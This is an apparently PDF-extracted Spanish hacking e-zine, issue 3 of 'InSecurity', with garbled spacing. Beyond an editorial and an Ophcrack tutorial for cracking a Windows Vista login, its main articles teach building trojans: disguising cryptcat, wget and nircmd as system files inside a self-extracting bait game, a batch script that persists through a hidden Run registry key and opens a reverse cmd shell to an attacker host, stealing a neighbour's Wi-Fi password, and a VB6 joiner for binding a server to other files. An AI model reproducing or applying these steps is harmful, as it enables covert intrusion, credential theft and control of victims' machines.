41

eZine InSecurity N3

Embed Size (px)

Citation preview

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 1/41

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 2/41

Webwww.ezine-insecurity.com

Director Isirius

RedactoresE0N

 _TuXeD_ Isirius

HNAFEZirkuaSknight WHK 

Penguin-power 

DiseñoTxShack 

peibol 4.0B0rn2kill

MaquetaciónIsirius

BetaTestersCronos - Carthago

Zinc 

Agradecimientos

Mis más sinceras gracias atodo aquel que ha aportadosu granito de arena.

Editorial Hola de nuevo a todos. Por n volvemos a estar aquí. Mientras escribo estaeditorial tengo que ser sincero, la e-Zine no está terminada totalmente perolo estará para el dia de su publicación. En este número he tenido un granproblema y es que he estado un mes sin ordenador eso a echo que ahoratenga que ir mucho más rápido. Desde esta editorial quiero agradecer laparticipación de la e-Zine a ZirKua que ha apoyado la e-Zine en todo mo-mento y también a B0rn2kill y peibol 4.0 que me han ayudado en el esprínnal. Lo último que quiero decir es que esta e-Zine va dedicada a aquellaspersonas que nunca creyeron que este momento llegaría una tercera pub-licación. Algunos me calicaron de loco al querer hacer una e-Zine y medecían que la dejaría de lado como veis eso no ha pasado y espero quenunca pase. Quizá no llegará a ser la e-Zine de elhacker.net pero ahora sela conoce como e-Zine InSecurity. Y como podéis ver ya tenemos algo muyimportante y es periodicidad en la publicación. Publicación trimestral.

Atentamente Isirius

Esta e-zine está bajo la li-cencia Creative Commons.

   B   i   e   n   v   e   n   i   d   o

   B   i   e   n   v

   e   n   i   d   o

UserBar InSecurity

Ayudanos a dar a conocer la e-Zine InSecurity

Puedo publicar la e-Zine en...Son muchas las personas que me han preguntado si pueden publicar la e-

Zine en sus Webs o Blogs mi respuesta es SI , siempre y cuando no se modi-

fque el contenido de la e-Zine.

Comunidades participantes

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 3/41

Cómo participar 

Todas aquellas personas que quieran participar, colaborar y publicar sus artículos en la e-Zine InSecuritypueden enviar sus artículos a:

[email protected]

Puntos a tener en cuenta:-Si un artículo es enviado a esta dirección de correo no obliga a los participantes de la e-Zine a publicar dichoartículo.-Si el artículo no es publicado en la e-Zine nos pondremos en contacto con el escritor para que mejore suartículo, o directamente será devuelto a su propietario para que él mismo pueda publicar dicho artículo.-Los artículos deben estar escritos con una mínima ormalidad y coherencia, de orma que el mayor númerode personas sea capaz de comprenderlo.

ÍNDICEHackeando Windows Vista 4

 Jugando con Cryptcat I y II   6 

Creando un Joiner en VB 6.0   14Cluster Alta disponibilidad en Linux  18Ocultación de IP por nombre de dominio bajo Linux    22Confguración e instalación de directorio activo 26 

Todo Cooling 31

Proyecto UniCom¿Qué es una e-Zine?

Es una revista electrónica en este caso relacionada con la inormática totalmente gratuita.

¿Cuál es la idea?

Mi idea es que entre todas las comunidades de la red tanto las de Windows, Hacking, Linux, Diseño, etc. consigamos crear una e-Zine lo más completa posible. Hay que decir que la e-Zine InSecurity ya lleva dos números publicados que han sidomuy bien aceptados.

¿Cómo aplicar la idea?Bueno he pensado que cada comunidad que quiera participar lo único que deberá hacer es escribir un manual sobre eltema que más se trate en dicha comunidad. Después en la e-Zine se pondrá el nombre y el banner de la web así como laURL en la Web de la e-Zine lo mismo y como no, el nombre del autor y toda la inormación necesaria.Duración del banner.Cuando una comunidad haga una aportación tendrá el banner en la e-Zine durante dos publicaciones es decir si entregáisun artículo en el número 3 y en el número 4 no entregáis ningún articulo el banner y la inormación se mantendrá peroen la quinta ya no.

Porque al fn y al cabo a todos nos gusta lo mismo “la inormática”.

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 4/41

Hackeando Windows VistaPorque Windows puede ser maravilloso

IntroducciónEn ese artículo os voy a enseñar comopodéis burlar la seguridad de unSistema Operativo Windows, en esteejemplo utilizaremos el tan conocidoWindows Vista, consiguiendo la con-traseña de un usuario protegido.

Windows Vista

Microsot Win-dows Vista esla versión delsistema op-erativo Micro-sot Windowsque sucede aWindows XP.Durante su desarrollo ue conocidocomo Windows Longhorn. Fue lan-zado el 30 de noviembre de 2006

para el mundo empresarial a travésde licenciamiento por volumen. Elresto de las versiones empaquetadaspara el usuario nal y OEM salierona la venta el 30 de enero de 2007. Lacampaña de lanzamiento ue inclusomás costosa que la de Windows 95,ocurrido el 25 de agosto de 1995,debido a que incluye, además, otrosproductos como Microsot Oce2007, y Exchange Server 2007.

Herramientas necesarias 

Para este ejercicio, vamos a necesitar una sola herramienta, que ha sido

creada especialmente para acilitar-nos el trabajo, incluso automatizarlo.Ophcrack es un Live CD basadoen Ubuntu para crackear el archivoSAM de Windows, que ya explicare-mos más adelante qué es el SAM.

Podemos descargar el Live CDaquí .

Un poco de teoría

Ya que el Live-CD va a hacer casiautomáticamente todo el trabajo yoos voy a explicar que es lo que enverdad hace.

Cuando lo iniciamos accede a la par-tición donde se encuentra el archivoSAM y System encriptados que sonrequeridos para la operación. El ar-chivo SAM se encuentra en el direc-torio C\WINDOWS\system32\con-g, cuando estamos en Windows nopodemos tener acceso a este archivoporque ese archivo esta abierto ex-clusivamente para el Sistema Op-erativo. Luego la misma distribuciónautomáticamente procede a crackear

los hashes que contienen el archivoSAM, ósea los usuarios con sus re-spectivas contraseñas. Para crackear-las utiliza unas tablas, el programaque crackea el archivo SAM cargalas tablas 1 por 1 y prueba todas lascombinaciones posibles.

Escenario

El escenario de nuestro ejercicio vaa ser el siguiente nos encontramosen un ordenador con el Sistema Op-erativo Windows Vista, que nos blo-quea el acceso, porque la cuenta deusuario nos pide contraseña para en-trar. Y nosotros como no la sabemostenemos que hacer algo para poderentrar en la sesión protegida. Comopodéis ver en la imagen este seríanuestro escenario.

www.ezine-insecurity.com

Equipo necesario•Procesador a 800Mhz •512Mb de RAM•Tarjeta gráca compatible con

DirectX 9.0

Sin embargo, los requisitos nec-esarios para disrutar de todas lasuncionalidades, incluida la inter-az Aero, son: 

•Procesador a 1Ghz•1Gb de memoria RAM•Tarjeta gráca capaz de correr Windows Aero.•Disco duro de 40Gb con al

menos 15 libres.

Grabar una Imágen ISO

Si nunca has grabado un una ima-gen ISO una manera muy sencillade hacerlo es instalar el Nero (unode los programas mas conocidospara grabar cds o DVDs) después dela instalación tema que no vamos aabordar en este artículo debéis hac-er lo siguiente. Clic derecho—Abrir con—Elegir programa—Examinar.Después buscad el ejecutable Nero.exe y lo seleccionáis el mismo pro-

grama identicara el archivo y solodeberéis seguir los pasos típicos degrabación.

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 5/41

Las contraseñas que he puesto sonmuy sencillas, para así no tener queesperar tanto ya que esto es solo un

ejemplo.

Empezamos

Bien lo primero que vamos a hacer es iniciar el ordenador desde el Live-CD ophcrack .

Estos son más o menos los pasos quesigue el Live-CD solito.

Carga las tablas.

Crackea el SAM

Final del trabajo.

Como podéis ver ya no hay que hac-er nada más automáticamente he-mos obtenido la contraseña del usu-

ario y ahora podemos acceder a lacuenta sin ningún problema. ¿Quete ha parecido el ejercicio?. Demasia-do corto? Quieres que me enrolle…No hombre como podéis ver ha sidotan simple como esto, este ejerci-cio podría haberse echo de maneramanual, acceder a la partición, copiar el SAM, crackearlo… Pero para quecomplicarnos la vida si puede ser tansencillo hacerlo. Que me estoy enrol-lando :P.

Despedida

Bueno en este ejercicio espero hab-eros enseñado dos cosas, la primeraes como podemos burlar la seguri-dad de un sistema operativo Win-

dows, ya que este método no solosirve para el Vista sino también paraotras versiones como el XP, y tam-bién espero haberos enseñado queencontrando las herramientas nec-esarias podemos hacer que nuestroejercicio sea mucho más rápido eincluso a veces mucho más eectivosi como veis hasta tiene moraleja earticulo. Bueno me despido y esperoque el artículo os haya gustado.

Autor-IsiriusUsuario Contraseña

Isirius noseinsecurity noses

www.ezine-insecurity.com

Hackeando Windows Vista

Links Interesantes

Web Ocial Ophcrack 

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 6/41

Jugando con Cryptcat I y II

¿Qué es Cryptcat?Es un sotware que tiene exacta-mente la misma uncionalidad quenetcat a dierencia que su transer-encia de paquetes son encriptados,en otras palabras más simples es lomismo que el netcat pero cuando al-guien está monitoreando su red yano podrá ver lo que está pasando…antes con netcat podían descubrirte

gracias a sus “Sniers” tal comoaparece en esta imagen:

Si no entiendes lo que digo enton-ces no te preocupes… lo que quierodecir es que es más seguro que net-cat eso es todo :p .

Otra ventaja es que Cryptcat NOes detectado por ningún antivirusporque es una herramienta de ad-ministración remota… al igual quenetcat pero bueno… así son las co-sas de la vida, seguro que en unassemanas o meses más será tomadocomo troyano igual que netcat.

En este tutorial aprenderemos asacarle el jugo a cryptcat como her-ramienta remota desde subirlo conuna webshell hasta convertirlo en unpoderosísimo botnet.OK, manos a la obra.

Materiales:* Cryptcat NT* Winrar * HFS* Wget * Nircmd* Un icono

Pueden descargar cada archivodesde: Herramientas InSecurity.

Para los que no saben que es NetCat haré un pequeño repaso sobre:

Troyanizando Cryptcat (Shellinversa)

Primero le cambiamos el nombre alcryptcat y le pondremos “msnmsgr.exe”, al wget le ponemos “smss.exe”y por último al Nircmd le ponemos

“update.exe”, ahora debería quedar algo asi… no se olviden de cada nom-bre para no conundirse después:

cryptcat.exe > msnmsgr.exewget.exe > smss.exenircmd.exe > update.exe

Mas adelante veremos para que sirveel wget y el nircmd.

Ahora escogemos un cebo … enmi caso usaré un juego llamado ttt (Tic Tac Toe) conocen el juego delgato? :p , ahora que tenemos los 4ejecutables (msnmsgr.exe, smss.exe,update.exe y ttt.exe) vamos a selec-cionarlos y con el botón derecho ledamos en “añadir al archivo”:

Ahora le damos nombre (yo le pusecarnada.exe) y le decimos que quer-emos crear un archivo SFX para quese autoejecute al descomprimirse…

no importa que la otra persona notenga instalado winrar porque seejecutará igual… pasa de ser .rar a.exe :

Ahora vamos a la pestaña “Avanza-do” y hacemos clic donde dice “Op-ciones SFX”:

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 7/41

Aparecerá la ventana para las op-ciones de SFX y donde dice “Rutade extracción” le ponemos %home-path%\printer ¿Por qué?, porque%homepath% signica c:\documentsand settings\usuario y es el único di-rectorio donde tienes acceso de so-bre escritura (%tmp% está dentrode %homepath%), además le deci-mos printer para hacer creer que esun driver o algo que tenga que ver con impresoras.. asi no sospechan :p.Donde dice “Ejecutar tras la extrac-ción” escribimos “ejecutar” y nadamas… después veremos porque:

Ahora vamos a la pestañita “Modos”

y le decimos que no muestre nada yque no sobrescriba nada para evitar que arroje errores al intentar sobre-scribir:

Ahora vamos a la pestaña “Texto eicono” y vamos a elegir el icono paranuestra carnada (yo elegí el de Dun-geon :p ).. tal como aparece en laimagen después de elegir el icono ledamos aceptar y luego aceptar nue-vamente en las opciones avanzadasde SFX:

Recuerdan cuando pusimos “ejecu-tar”?, ahora lo vamos a editar en lapestaña “Comentario”:

Debe quedar de la siguente man-era:

Esto signica que se ejecutará elcryptcat e inmediatamente el juegottt para no levantar sospechas. Lu-ego le damos aceptar y debe quedar algo asi:

Donde dice 127.0.0.1 le ponemosnuestra IP obviamente. Tu IP puedesverla abriendo el menú inicio y haci-endo clic donde dice “ejecutar” y lepones esto: cmd /c ipcong&&pausey le das aceptar, debe aparecerte

algo como esto:

Como pueden ver la ip que usa-remos en Internet será la de colorrojo y si lo hacemos en una pc queestá dentro de una misma red porejemplo las PCs de tu casa usarás laverde. La de color verde es la quedice “Conexión de área local” y la derojo aparece el nombre de tu conex-ión, en mi caso dice speedy.

Ahora para mayor comodidad colo-

camos nuestro cryptcat en C:\win-dows y luego vamos al menú inicioy hacemos clic en “ejecutar”, luegoescribimos “CMD” y le damos enaceptar… te aparecerá una pantal-la similar a la de arriba y escribiráscryptcat -vv -L -p 99 , por último ledas la carnada a la persona de prue-ba (victima) y cuando lo ejecute yatendrás el control de su pc a travésde una shell inversa encriptada.

Jugando con Cryptcat I y II

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 8/41

Ahora que ya tenemos la shell lesenseñaré el uso de Wget y Nircmd.

¿Nunca has sentido la necesidad dehacer transerencia de archivos?… elWget te permite eso de la siguientemanera.

Primero pon tu HFS en un lugar donde no lo moverás mas… te re-comiendo en archivos de programa.,luego le haces doble clic y te apare-cerá un mensaje, le respondes conun “no” :p.Ahora que ya está abierto arrastrasun archivo cualquiera hasta ese pro-grama y aparecerá un link arriba(en mi caso utilicé el Wireless KeyView):

¿Ahora como hacemos el traspasodel archivo?Desde tu shell ejecutamos lo si-guiente:

WGet.exe -c -t0 http://www.PAG-INAAQUI.com/ARCHIVOAQUI.ZiP

Le ponemos la ruta que aparece enel HFS y quedaría algo asi:

WGet.exe -c -t0http://190.22.126.81/Wireless-KeyView.exe

Ahora que lo bajamos podremosejecutarlo WirelessKeyView.exe /stext log.txt ahora esperas unos 10segundos para que se genere el ar-chivo y lo visualizas con el comandotype “type log.txt” y tendrás la con-traseña de conexión wireless de tuvecino.

Ahora… ¿Para que sirve el Nircmd?es un sotware con multitudes deunciones que te van a simplicar lavida a montones.

Ejemplos para el uso de Nircmd:

Jugando con Cryptcat I y II

Open the door o J: CD-ROMdrive

nircmd.exe cdrom open j:

Close the door o Y: CD-ROMdrive

nircmd.exe cdrom close y:

Increase the system volume by2000 units (out o 65535)

nircmd.exe changesysvolume2000

Decrease the system volume by5000 units (out o 65535)

nircmd.exe changesysvolume-5000

Set the volume to the highest value

nircmd.exe setsysvolume 65535

Mute the system volume nircmd.exe mutesysvolume 1Unmute the system volume nircmd.exe mutesysvolume 0Switch the system volumebetween the mute and normalstate.

nircmd.exe mutesysvolume 2

Create a shortcut on your desktop that switch the systemvolume between the mute andnormal state.

nircmd.exe cmdshortcut “~$older.desktop$” “Switch Vol-ume” mutesysvolume 2

Turn o the monitor nircmd.exe monitor o  Start the deault screen saver nircmd.exe screensaver 

Put your computer in ’standby’mode nircmd.exe standby

log o the current user nircmd.exe exitwin logo  Ask i you want to reboot, andi you answer ‘Yes’, reboot thecomputer.

nircmd.exe qboxcom “Do youwant to reboot ?” “question”exitwin reboot 

Turn o your computer nircmd.exe exitwin powero  Turn o all computers speciedin computers.txt !

multiremote copy “c:\temp\computers.txt” exitwin powero orce

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 9/41

Por ejemplo puedes detener proce-sos, cambiar la resolución del moni-tor, instalar y desinstalar sotware,manejo de registros, lanza mensajesen orma de ventanita, hasta manejar los recursos de Windows a través desu API directamente. Además puedemanejar una cantidad de variablesenorme. El mismo archivo comprim-ido para su descarga incluye un ar-chivo de ayuda extra.Ahora que ya recuerdan bien comotroyanizar netcat (en este caso crypt-cat) veremos otras unciones muybuenas como por ejemplo crear unminirelay de conexiones directas conhping2 hasta crear tu propio esca-neador de puertos casero, si me dan

permiso podré demostrar como crear una botnet muy poderosa con crypt-cat siguiendo instrucciones desdeuna web zombi con wget.

Troyanizando CryptCat II

¿Te has jado que si utilizas una ipvariable y no constas de un dominiopropio no tienes orma de recuperar una shell inversa?. Antiguamente las

personas instalaban un sistema detraducción DNS llamado NO-IP, lomalo es que te baneaban y perdíastus shells. Yo les mostraré como re-emplazar a NO-IP con tan solo unsimple script hecho en un block denotas con extensión *.bat.

Materiales:

Un dominio (pueden usar

iespana)Cryptcat WinrarWget Nircmd1 Icono

Para comenzar iniciaremos creandoalgo muy similar a la primera partede este tuto asi que los nombresseguirán siendo los mismos:

cryptcat.exe > msnmsgr.exe

wget.exe > sass.exe

 nircmd.exe > update.exe

Primero abrimos el block de notas otu kwrite o lo que desees para crear un texto simple (No usar Word):Y lo guardamos como inicio.bat Fíjense en que Set bug=aaa…. Debe

ir en una sola línea.Donde dice timeout=5 le decimoscuanto se va a retardar para volver a realizar un intento en caso de queno te encuentres conectado, ¿quepasaría si le ponemos “0”?, su loopsería tan rápido que utilizaría mu-chos recursos y sería ácil detectar.

Donde dice Host=512.iespana.es yole puse mi host pero ustedes le pon-

drán sus propios host.

Donde dice INI=cong.ini le estoyindicando la descarga de un textoque ya les explicaré para que sirve.

Lo que hace ese script es descargar el archivo cong.ini desde mi host,luego lo cargará y ejecutará el Crypt-Cat con los parámetros dados en esearchivo

Si se realiza la conexión no hacenada mas hasta que te desconectessi no estas o te desconectas enton-ces realizará un ping la cantidad deveces que le indicamos en timeoutpara causar un retraso, y al nadonde dice goto 1 quiere decir quecomenzará nuevamente desde :1vericando nuevamente el archivo

de conguración y realizando nue-vamente la conexión.

Si eres un usuario avanzado enton-ces intenta evitar colocar direccionescon variables en PHP tales comoesta:d e s c a r g aphp?dw=solicitar&archivo=cong.in

Si pones ese link dentro del battomará cada carácter como parte decomando mismo =& y no te va a re-sultar.Nota: si no entiendes entonces nome hagas caso :)

¿Que hace lo que está de colorverde?, mas adelante lo veremos ;).

Set timeout=5Set Host=512.iespana.esSet INI=cong.iniSet Ruta=%homedrive%%homepath%\printer Set bug=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaSet Puerto=30:-------------------------------------------------::1reg add HKcU\Sotware\Microsot\Windows\CurrentVersion\Run /v“%bug%” /t REG_SZ /d “%ruta%\presetup.exe” /f > nuldel / /q %INI%sass.exe -c -t0 http://%Host%/%INI%ping n %timeoutout% 127.0.0.1or / %%i in (cong.ini) do msnmsgr.exe -d -e cmd.exe %%i %Puerto%ping n %timeoutout% 127.0.0.1

goto 1:-------------------------------------------------:

Jugando con Cryptcat I y II

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 10/41

Ahora se harán la pregunta delmillón ¿Cómo ocultamos la ventanitade ese bat?, para eso tenemos crypt-cat. Primero vamos a diseñar una en-trada de registro para hacer un autoarranque, pero ojo… en esta ocasiónno vamos a registrar cryptcat sino awinrar SFX el cual se encargará deejecutar CryptCat, ¿Por qué?, no seáistan preguntón ¬¬ pero bueno… yaque lo preguntas, cuando CryptCat inicia desde tu registro este no secerrará ya que vamos a hacer correr el bat desde CryptCat.

Primero creamos un nuevo archivorar presionando el botón derecho detu Mouse sobre tu escritorio:

Ahora ese nuevo archivo le hacesdoble clic y se abrirá Winrar:

Tal como se ve en la imagen… (1)Primero vamos a presionar el botónllamado “SFX” para convertirlo en unarchivo de winrar auto ejecutable,(2)luego nos aparecerá una ventanapara realizar las conguraciones deese archivo SFX, (3).Ahora viene lamagia de CryptCat más Winrar…

Le indicamos que cuando se eje-cute el archivo SFX primeramenteejecute msnmsgr.exe –d –e inicio.bat 127.0.0.1 99, después modicare-mos el comentario para realizar unautoconexión inversa, una ves quese realice la conexión comenzará aejecutarse el archivo inicio.bat sin ser visto reemplazando la consola de co-mandos ̂ ^.

Luego procederemos a cambiar depestaña hasta “Modos” y seleccio-namos la opción de ocultar todo yomitir archivos existentes en caso dealguna alla imprevista aunque nodescomprima nada porque recuerdaque es un chero vacío que se limi-

tará a ejecutar ordenes:

Ahora le damos un icono muy dis-creto para no levantar sospechasdesde la pestaña llamada “Textoe icono”:

Ahora aceptamos todo y cerramos laúltima ventana y nos quedará algoasí:

Podemos ver que el archivo rar se haconvertido en un ejecutable.Ya no nos sirve el archivo rar así quelo borramos y al ejecutable le cambi-amos el nombre de “Nuevo archivoWinRar.exe” a “presetup.rar”

Le hacemos doble clic y comenza-mos a editarlo:

Fíjense en el orden… primero escu-chamos y después enviamos la shelinversa o no uncionaría al revés.Le damos en aceptar y cerramos laventana del Winrar, por último re-nombramos “presetup.rar” a “pre-setup.exe”.

¿Recuerdan lo que estaba de color

verde en el archivo bat?, lo que hacees:

Set Ruta=%homedrive%%homepath%\printer Indica la ruta donde descomprimiremos nuestros archivos nales.

reg add HKcU\Sotware\Microsot\Windows\CurrentVersion\Run /v“%bug%” /t REG_SZ /d “%ruta%\presetup.exe” /f > nulCon esto agregamos una entrada deregistro que auto ejecutará nuestrapresetup todos los días.

Jugando con Cryptcat I y II

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 11/41

Para que es ¿Set bug?, indicamos queel nombre de la entrada de registrosuperará los 256 caracteres causan-do un bug en el editor de registroshaciéndolo invisible (este bug no hasido reparado aún. Gracias MITM).

Fíjense además que incluí la entradade registro dentro del bat, de estaorma si ha sido borrada volverá aauto registrarse.

Ahora que tenemos todo listo vamosa buscar nuestro cebo :D ahora uti-lizaré un antiguo sotware llamadoVOMISTAR el cual antiguamentepodías generar tarjetas de prepagocon tan solo dar un clic (antes si un-

cionaban pero ya no porque el tipo decirado de las tarjetas de timoónikason dierentes). Ahora que tenemosvomistar.exe, sass.exe, presetup.exe,update.exe, msnmsgr.exe e inicio.bat vamos a proceder a empaquetar conWinrar de la siguiente orma:

Seleccionamos todo y con el botónderecho seleccionamos la opciónde “añadir al archivo” y veremos laconocida ventanita de winrar… así seguimos los mismos pasos de siem-pre:

En la siguiente imagen vemos comoseleccionamos la pestaña “Avan-zado” y seleccionamos “OpcionesSFX”, luego aparecerá la segundaventanita (la derecha) llamada “Op-ciones avanzadas” y le indicaremosla ruta de extracción y nuevamentedonde dice “Ejecutar tras la extrac-ción” solamente escribiremos “ejecu-tar” para editarlo mas adelante:

En la siguiente imagen selecciona-mos las opciones de siempre paraocultar todo:

Ahora nos cambiamos hasta la pesta-ña “Texto e icono” y seleccionamosen “Examinar” para elegir nuestroicono:

Ahora aceptamos y volvemos aesta ventana para editar nuestraejecución en SFX (Pestaña “co-mentario”):

Debería quedar algo así:

Aceptamos todo y se creará nuestracarnada:

¿Una vez que la victima ejecute el ar-chivo que sucederá?, verá solamenteel vomistar y en segundo plano seestará ejecutando en un loop con-tinuo el script en batch esperando tudirección IP o DNS:

Jugando con Cryptcat I y II

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 12/41

Pero por debajo:

¿Ahora como tomamos el control?,creamos el archivo cong.ini quehabíamos puesto antes en el bat.

Abrimos el block de notas y escribi-mos nuestra IP donde recibiremos laconexión:

190.22.118.133

¿Como se cual es mi ip?, Menú ini-cio voy donde dice “ejecutar” y es-cribo cmd /c ipcong&&pause luegoacepto y veré algo como esto:

Igual que antes tu ip pública den-tro de Internet será la de color rojodonde aparece tu proveedor de In-ternet y el de color verde es la ip de

red interna como la de tu casa o tra-bajo.

Otra orma es ir a esta dirección:http://ip.interchile.com/ y te apare-cerá en letras grandes tu IP.

Y lo guardo como cong.ini paradespués subirlo a mi servidor deiespana:

Y…….. ha llegado cartaa!!! :D

Ahora solo alta recibirla escuchandocon CryptCat 

Hemos concluido que nuestro scriptcreado en el block de notas puedereemplazar a NO-IP utilizando Wgecomo downloader.

Ustedes dirán ¿Cuanto pesa todo

esto?:

¿Como puedo tomar todas mis shellsal mismo tiempo?, lo puedes hacercon VBNserver el cual te permiterecibir todas las shells que desees ypoder controlarlas de a una o todasal mismo tiempo:

Jugando con Cryptcat I y II

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 13/41

La descarga es Herramientas InSe-curity.

Ahora entretengámonos observandoalgunas unciones de Nircmd :D, re-cuerden que le pusimos update.exe

“%programfles%\Internet Ex-plorer\iexplore.exe” “http://512.iespana.es/0day_ie7.html”

update.exe win trans ititle “inter-

net explorer” 256

Estos dos programas signica quevoy a abrir el Internet Explorer haciaun exploit remoto y para no levantar sospecha voy a ocultar esa ventanacon nircmd que ahora se llama up-date.exe.

Otras cosas pueden ser para losamantes de las bromas:

Abre la unidad : update.exe cdromopen :Dejas sin audio la pc: update.exemutesysvolume 1Apagar el monitor: update.exe mon-itor o 

Apaga la pc: update.exe exitwinpowero 

Reinicia servicios activos: update.exeservice restart MySql

Lee el portapapeles: update.exe clip-board readle “c:\ino.txt”Etc etc…

En realidad esto no es nada porqueNircmd es mucho mas ecaz quecualquier troyano o sistema de ad-ministración remota, es capaz de re-emplazar a Netbus, Radmin, Optixpro, bo, Taladrator, PsTools, Sub7 ymuchos más juntos a excepción desu capacidad para realizar una con-exión pero en cuando a revelar elestado de un sistema o poder modi-car toda la estructura de Windows a

tu antojo con una cantidad increíblede variables no te lo da nadie.

En el próxima parte (III) explicarécomo convertir CryptCat en un esca-neador de puertos, como ocultar pro-cesos y tareas para no ser vistos por el administrador de tareas, ademásenseñaré a crear tu propio hostinggratuito para poder continuar ense-ñando sobre como convertir Crypt-Cat en una poderosísima botnet.

Por ahora ninguna herramienta esdetectada por los antivirus ya queson sistemas de administración re-mota.

También utilizaremos CryptCat pararealizar conversaciones secretas sinque nadie pueda interceptar lo queescribes utilizando la red de tor.

Autor- WHK 

Jugando con Cryptcat I y II

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 14/41

Creando un Joiner en VB 6.0

¿Qué es un joiner?Yo soy de la opinión de que todobuen manual debe comenzar dandouna buena base teórica, haciendoque el lector comprenda bien lo queva a hacer en vez de darle un códigomal comentado y que se busque lavida, así que empecemos.

Lo primero de todo sería saber que

es un joiner:Un joiner es un sotware utilizadopara juntar en un solo archivo variosarchivos.Una vez conocemos que es exacta-mente un joiner aprendamos comose logra juntar varios archivos enuno solo, en nuestro caso vamos aprogramar uno en VB 6.0 que nospermita juntar innitos archivos enuno solo y añadirle algunas opcionesde extracción.

¿Cómo unciona un joiner?

Bien ahora ya sabemos que es unjoiner, pero ¿cómo podemos lograr hacer uno? ¿cómo se juntan variosarchivos en uno?

Lo primero que debemos saber esque un joiner consta de dos partes:- “Juntador”

- Stub

El “juntador” por llamarlo de algunamanera es lo que nosotros vemosdel joiner, el programa en el quevamos añadiendo los archivos quequeremos juntar a una lista y lu-ego apretamos un botón para crear el archivo que los contiene a todos.El stub es el corazón del joiner yes siempre un ejecutable. A él “pe-garemos” los archivos que ante-riormente hemos introducido enla lista del “juntador” para que

se lea a si mismo, se separe, ex-traiga cada archivo y los ejecute.

Explico esto último unpoco más detenidamente:El mecanismo de un joiner, como heexplicado anteriormente, es añadir los datos de los archivos a juntar aun stub. Este, al ejecutarse, debe autoleerse y cortarse de tal orma quedeje separados los archivos originales.

Una vez los tenga separados debemeter cada uno de estos archivosen el disco duro con la extensióncorrecta y ejecutarlos uno a uno.

Ese sería el esquema básico de cómoquedarían organizados los archivos.En él podemos ver como el server yla oto se “pegan” al stub. Recordar que el archivo nal tiene que ser siempre un ejecutable, no puedequedar un .jpg ni nada de eso.

Empecemos a programarBueno, ahora que ya sabemos comounciona un joiner y que es exacta-mente podemos empezar a progra-mar el nuestro propio.Lo primero que debemos decidir espara cuantos archivos será nuestrojoiner. Como somos muy ambiciososharemos que nuestro joiner puedacontener innitos archivos.El paso siguiente es decidir de quéorma separará el stub los archivosque le peguemos. Principalmenteexisten dos métodos, meter el tama-ño de los archivos que el stub llevapegados para que sepa por dondecortar o poner una “rma” entre ar-chivo y archivo para que el stub sepaque entre esas dos rmas se encon-trará el archivo.Yo por comodidad emplearé este se-gundo método.

Ahora si que sí. Abrid dos proyectosde VB y llamad a uno “Joiner” y aotro “Stub”.

Situaros en el proyecto Joiner yhacer clic derecho en el cuadro deherramientas y elegid la opción“Componentes”. Os aparecerá unaventana con diversos componentesde los cuales debéis seleccionar dosel “Microsot Common Dialog Con-trol 6.0” y el “Microsot Windows

Common Controls 6.0”. Una vezhecho esto añadís al Form1 dos bo-tones de nombres Añadir y Juntarun PictureBox con su nombre pordeecto, un ListView de nombre Lvun CommonDialog de nombre CDy nalmente una ImageList de nom-bre IL.Tras esto le añadís las columnas cor-respondientes al ListView para queos quede algo como esto:

www.ezine.insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 15/41

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 16/41

Como veis hemos leído todo el List-View y hemos metido en el stub (queinicialmente se encuentra como unadll camufada, para que quede másproesional) los datos correspondi-entes así como los archivos a juntar.

Ahora ya solo nos queda programarel stub. Un aspecto undamental es

conocer la ruta de nuestro stub y al-guno dirá “Pues usamos App.Path yya está”. Bueno esa es una opciónpero si queremos dejar al usuarioque elija la extensión del ejecutabley elija .com por ejemplo que llamamenos la atención que .exe esta un-ción no nos servirá.Para conocer nuestra ruta con totaseguridad usaremos pues la api Get -ModuleFileName. Así que ala de nue-vo abrid vuestra Api Guide y mirad

la inormación al respecto. Veréis unaunción que yo he adaptado así:

Una vez tenemos esto en el Form_ Load nos leemos así para separar los diversos datos:

